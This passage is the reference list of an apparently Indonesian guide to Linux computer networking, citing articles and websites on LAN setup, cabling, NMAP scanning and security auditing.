Husni. 2004. Implementasi Jaringan Komputer dengan Linux Redhat 9.Andi.Yogyakarta. Rio P, Bondhan. 2003. Diagram Pemasangan Kabel TP pada RJ 45. www.IlmuKomputer.Com
187
Copyright © 2007 hhan.wordpress.com Fahrial ,Jaka. 2003.Teknik Konfigurasi LAN. www.IlmuKomputer.Com Yerianto, D. 2003. Mengintip Host dengan Tools NMAP. www.IlmuKomputer.Com Herahadi. 2006. Exploit via Linux Auditor Security. http://jasakom.com/article.aspx?ID=740. http://www.gnu.org/software/grub/ http://www.remote-exploit.org http://www.Insecure.org http://www.istecs.org/~harry/artikel/lan/
188